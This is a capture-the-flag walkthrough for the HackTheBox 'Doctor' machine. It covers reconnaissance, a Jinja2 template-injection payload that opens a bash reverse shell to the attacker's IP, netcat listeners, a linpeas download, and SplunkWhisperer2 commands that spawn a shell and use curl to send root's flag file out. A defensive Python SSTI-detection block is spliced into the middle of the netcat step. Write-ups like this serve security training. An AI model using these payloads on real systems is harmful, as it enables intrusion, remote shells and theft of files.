Doctor HackTheBox Guide

Welcome to HackingVision. Today we will show you how to exploit the HackTheBox (Doctor) challenge from https://hackthebox.eu

First we need to do some reconnaissance on our target. Let's see which ports are open on the target system by firing up nmap.

As you can see from the screenshot below, nmap found ports 22/tcp, 80/tcp and 8089/tcp open on the target's web server.

Port meaning

Port 22/tcp open means that the target is running an SSH service.

Port 80/tcp open means that the target is running an Apache web server.

Port 8089/tcp is open because the server is running Splunkd.

Splunk (big data analysis software) uses the following ports by default:
514 - network input port
8000 - web port (clients accessing the Splunk search page)
8080 - index replication port
8089 - management port (splunkd, also used by deployment server)
9997 - indexing port (web interface)
9998 - SSL port

https://www.speedguide.net/port.php?port=8089

8089/tcp open ssl/http Splunkd httpd

Let's take what we learned from our nmap scan: if the web server has port 80 open, it may be hosting a website or a web application.

If we go to the target's IP in a web browser, we are presented with the web page that the target's web server is serving.

Let's take a deeper look: the website has an email address attached to it. If we go back to our nmap scan and take note of open port 8089, we can see that the target's web server runs a service called Splunkd. Port 8089 is the default Splunk management port.

Let's take a closer look at the email address linked on the website's main page: info@doctors.htb. The domain part of the email address is doctors.htb.

Now let's add this domain to our /etc/hosts file in Kali Linux. The hosts file in Linux maps hostnames to IP addresses.

Open the /etc/hosts file in Kali Linux using the following command.

nano /etc/hosts

We already know the IPv4 address of the Doctor machine from our nmap scan, so let's add it to our /etc/hosts file.

When we first open our hosts file it will show your network's local host information. Modify /etc/hosts and add the doctors.htb domain and its IPv4 address below your network's local host information.

Now when we load the doctors.htb website we are presented with a login page. This is because /etc/hosts maps the domain name to the target's IP address, and the web server serves a different site for the doctors.htb hostname than it does for the bare IP address.

The screenshot below shows Doctor Secure Messaging. This portal is used to manage secure messaging within the doctors.htb website.


If we try to log in we are presented with a blank page; however, we are logged in, as we can see a Logout button on the right-hand side of the website's menu.

Let's take a deeper look at the web server's structure. We can do this by using a tool called gobuster.

Gobuster is a tool used to brute-force:

  • URIs (directories and files) in web sites.
  • DNS subdomains (with wildcard support).
  • Virtual Host names on target web servers.
  • Open Amazon S3 buckets

https://github.com/OJ/gobuster

Open a new terminal and use the following command to list directories on the target's web server.

gobuster dir --url http://doctors.htb -w /usr/share/wordlists/dirb/common.txt

As we can see from the screenshot below, gobuster found that doctors.htb has the following directories.

/account

/archive

/home

/login

/logout

/register

/server-status (Status: 403)

If we open a web browser and go to doctors.htb/archive we are presented with a blank page.

Let's take a look at the source code for http://doctors.htb/archive. We can do this by using the view-source: prefix.

To view the page source go to

view-source:http://doctors.htb/archive

As we can see from the screenshot below, the page source lists some HTML code including the website's page title.

Let's try entering some SSTI payloads. SSTI stands for Server-Side Template Injection.

A server-side template injection happens when an attacker uses native template syntax to inject a malicious payload into a template, which is then executed on the server side.

SSTI attacks should not be confused with XSS attacks: they are different because they target the web server's internals to leverage Remote Code Execution (RCE).


You can read more about SSTI (Server-Side Template Injection) here: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection


We will use the following payload to check whether the website is vulnerable to SSTI attacks.

{{7*7}}

If you take a look at the screenshot below, we can see that we were able to create a post using our SSTI payload.

Now if we look at the website's source code, something has changed: we now have a new title, 49, because 7*7 = 49, which is the expression we specified in our payload.

Let's try to exploit the web server. To do this we need to inject an SSTI payload that makes the target connect back to port 4444 on our machine. 4444 (TCP/UDP) is the default listener port for Metasploit.

To do this we need to create a New Post in Doctor Secure Messaging and inject our payload. The payload tells the web server to use bash to open a reverse shell to port 4444 on our IP address, 10.10.14.27.

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("bash -c 'bash -i >& /dev/tcp/10.10.14.27/4444 0>&1'").read()}}{%endif%}{%endfor%}

In the screenshot below we can see our SSTI payload displayed in the target's Secure Messaging portal.


Now let's take a look at the source code again. It looks the same as when we injected the {{7*7}} payload, which means the web server is accepting our SSTI payloads.

Now we are going to start netcat and tell it to listen on port 4444. We can do this by opening a new terminal in Kali Linux and entering the following command.
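From the defender's side, the two probes above (the {{7*7}} arithmetic check and the {% for %} statement block walking __subclasses__) are exactly what an application owner should be flagging in submitted post titles and bodies, and the "49 appears in the title" observation is a regression test for whether user input ever reaches the template engine. The following is an added example, not code from the original page or from the Doctor machine; the sample posts are constructed, and the Jinja2-style syntax is assumed from the payload shown above.

```python
import re

# Patterns drawn from the probes used in this walkthrough: a Jinja2-style
# expression block such as {{7*7}}, a statement block such as {% for %},
# and the attribute names the RCE payload walks through to reach os.popen.
EXPR_BLOCK = re.compile(r"\{\{.*?\}\}", re.S)
STMT_BLOCK = re.compile(r"\{%.*?%\}", re.S)
ARITH_PROBE = re.compile(r"\{\{\s*(\d+)\s*([*+-])\s*(\d+)\s*\}\}")
RISKY_TOKENS = ("__class__", "__base__", "__subclasses__",
                "__builtins__", "__import__", "popen", "/dev/tcp/")

# Constructed sample posts (title, body) as the Secure Messaging portal might
# store them; the second and third mirror the probes shown on this page.
SAMPLE_POSTS = [
    ("Appointment reminder", "Dr. Smith is available on Monday."),
    ("{{7*7}}", "probe"),
    ("notes", "{% for x in ().__class__.__base__.__subclasses__() %}{% endfor %}"),
]


def ssti_indicators(text):
    """Return the SSTI indicators present in a submitted field (empty if clean)."""
    found = []
    if ARITH_PROBE.search(text):
        found.append("arithmetic-probe")
    elif EXPR_BLOCK.search(text):
        found.append("expression-block")
    if STMT_BLOCK.search(text):
        found.append("statement-block")
    found.extend(f"token:{tok}" for tok in RISKY_TOKENS if tok in text)
    return found


def scan_posts(posts):
    """Flag every post whose title or body carries at least one indicator."""
    flagged = []
    for title, body in posts:
        hits = ssti_indicators(title) + ssti_indicators(body)
        if hits:
            flagged.append((title, hits))
    return flagged


def probe_was_evaluated(submitted, rendered):
    """True when an arithmetic probe came back as its computed value, i.e. the
    page's own test: {{7*7}} submitted, 49 shown in the rendered title."""
    m = ARITH_PROBE.fullmatch(submitted.strip())
    if not m:
        return False
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    expected = {"*": a * b, "+": a + b, "-": a - b}[op]
    return rendered.strip() == str(expected)
```

Run scan_posts over stored posts to triage them, and use probe_was_evaluated in an application test that submits a probe title and compares it with what the page renders; a True result means the title is being passed into the template source rather than as a template variable.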

nc -lnvp 4444

Command breakdown:

  • nc = netcat
  • -l tells netcat to listen for inbound connections.
  • -n tells netcat to use numeric-only IP addresses (no DNS).
  • -v sets verbose mode; you can use -vv to be more verbose.
  • -p tells netcat which local port number to listen on.

Now that netcat is listening on port 4444, the reverse shell from our SSTI payload connects back to it and we land in a shell on the target. From that shell we need to download linpeas.

Linpeas is a script that enumerates the target for privilege escalation paths, such as writable directories and credentials left in logs.

From the /tmp folder we can use wget http://10.10.14.38:8000/linpeas.sh to download linpeas.

We also need to start an HTTP server on our Kali machine to serve linpeas. We can do this by opening another terminal and entering the following command.

sudo python3 -m http.server

You will be asked for your Kali Linux password to start the HTTP server. Once started, it listens on port 8000.

Now that linpeas is downloaded we need to make it executable; without the right permissions linpeas won't run.

To make linpeas executable use the following command from the /tmp directory.

chmod +x linpeas.sh

Once we launch linpeas, the tool starts enumerating and caching writable folders.

Once linpeas has cached all writable directories, it then tries to find any passwords inside logs.

As you can see from the screenshot below, linpeas found a password or an email; in this case the information found by linpeas is a password (Guitar123).

We also see a password attempt from IP address 10.10.14.2 for a user account called ‘shaun’, and that the username and password were successfully validated for ‘root’.

Our reverse shell is running as web@doctor. Let's use the information from our linpeas scan to switch to a different user.

To do this we switch user with the su command.

su shaun

Enter the password ‘Guitar123’ that we extracted from the target server using linpeas, then use the whoami command to display the current user.

whoami

As you can see from the screenshot below, the current user is ‘shaun’. Let's cd into shaun's home directory. We can do this using the command

cd /home/shaun

Now that we are inside shaun's home directory we can see that shaun has a file called user.txt. Let's cat this file to see its contents.

cat user.txt

Let's find out where splunk is located. Use the command below to find it.

whereis splunk

The output tells us that splunk is located at /opt/splunkforwarder/bin/splunk. We can also find the splunk version by using the following command.

/opt/splunkforwarder/bin/splunk --version

The terminal output tells us that version 8.0.5 is used on the target.

Now we can perform local privilege escalation and/or remote code execution through Splunk Universal Forwarder (UF) misconfigurations. To do this we need a tool called SplunkWhisperer2.

https://github.com/cnotin/SplunkWhisperer2


Using SplunkWhisperer2 we will connect to the host and inject some payloads.

In your terminal enter the following commands to launch SplunkWhisperer2 against the target.

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.27 --username shaun --password "Guitar123" --payload "nc.traditional -e /bin/bash 10.10.14.27 5555"
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.27 --username shaun --password "Guitar123" --payload "curl -F 'data=@/root/root.txt' http://10.10.14.27:5555"

Read more on abusing Splunk forwarders for RCE and persistence here: https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/

In a new terminal launch netcat and tell it to listen on local port 5555. We can do this using the following command.

nc -lnvp 5555

As we can see in the screenshot below, netcat started listening on port 5555 and received the flag.